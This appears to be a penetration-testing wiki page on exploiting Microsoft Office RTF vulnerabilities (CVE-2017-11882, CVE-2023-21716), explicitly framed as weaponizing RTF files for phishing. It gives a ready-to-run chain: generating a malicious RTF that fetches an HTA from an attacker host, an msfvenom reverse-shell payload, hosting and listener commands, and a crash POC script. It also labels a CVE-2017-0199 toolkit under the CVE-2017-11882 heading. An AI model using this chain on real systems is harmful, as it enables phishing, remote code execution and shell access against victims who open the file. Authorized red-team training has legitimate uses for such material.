MS Office - RTF Files RCE

Theory

RTF files are widely used in business communications for their rich formatting capabilities, making them a perfect disguise for malicious payloads. CVE-2023-21716 and CVE-2017-11882 are vulnerabilities within Microsoft Office that can be leveraged to execute arbitrary code when victims open a compromised RTF file.

The page is about weaponize RTF files for effective phishing campaigns

Practice

CVE-2017-11882

We may use this exploit (python) which provides a quick and effective way to exploit Microsoft RTF RCE vulnerability.

Firts, generate the malicious RTF file

python2.7 cve-2017-0199_toolkit.py -M gen -w bad.rtf -u http://<ATTACKING_IP>/bad.hta -t RTF -x 0

The exploit will call and execute an HTA file, you may generate it as follow

msfvenom -p windows/shell/reverse_tcp LHOST=<ATTACKING_IP> LPORT=<ATTACKING_PORT> -f hta-psh -o bad.hta

Host bad.hta on your webserver and start a listener

#Start the webserver to host the bad.hta file
python3 -m http.server 80

#Start listener
rlwrap nc -lvnp <ATTACKING_PORT>

Finally, send the bad.rtf file to the target. Once victim will open malicious RTF file, you will get a reverse shell.

CVE-2023-21716

The exploit isn't weaponized yet, but here is the python POC

open("file.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))

Last updated 8 months ago